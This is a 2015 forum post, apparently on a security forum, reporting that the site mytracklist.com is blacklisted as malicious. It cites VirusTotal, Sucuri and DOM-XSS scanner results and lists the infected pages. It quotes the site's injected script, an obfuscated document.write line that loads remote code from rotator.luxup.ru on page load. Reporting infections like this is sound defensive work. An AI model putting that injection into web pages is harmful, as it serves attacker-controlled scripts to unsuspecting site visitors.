Author Topic: Suspicious or malicious website? (Read 1330 times)

polonus · « **on:** September 27, 2015, 01:05:56 AM »

See malware detected: http://killmalware.com/mytracklist.com/#
On domain: https://www.virustotal.com/nl/domain/mytracklist.com/information/
On URL: https://www.virustotal.com/nl/url/e93025d3969278bb9d320d686ec9d368eb0acecabf65dbecc089786526838a93/analysis/#additional-info
Sucuri detects malware: ISSUE DETECTED   DEFINITION   INFECTED URL
Website Malware   malware-entry-mwblacklisted35   -http://mytracklist.com
Website Malware   malware-entry-mwblacklisted35   -http://mytracklist.com/users.htm
Website Malware   malware-entry-mwblacklisted35   -http://mytracklist.com/allmusic.htm
Website Malware   malware-entry-mwblacklisted35   -http://mytracklist.com/random_song.htm
Website Malware   malware-entry-mwblacklisted35   -http://mytracklist.com/expanded_search.php
Website Malware   malware-entry-mwblacklisted35   -http://mytracklist.com/searchqueries.htm
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
document.write('<scr'+'ipt type="text/javascript" src="http://rotator.luxup.ru/top/39/?t='+((new Date()).getTime()%10000000)*100+Math.round(Math.random()*99)+'"><'+'/scr'+'ipt>');

See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fmytracklist.com%2Fusers.htm

Potentially suspicious file:
/js/jquery.lazyload-ad-1.4.2-min.js
Severity:   Potentially Suspicious
Reason:   Detected potentially suspicious content.
Details:   Detected potentially suspicious initialization of function pointer to JavaScript method document.write <code> __tmpvar145071553 = document.write; <code/>

polonus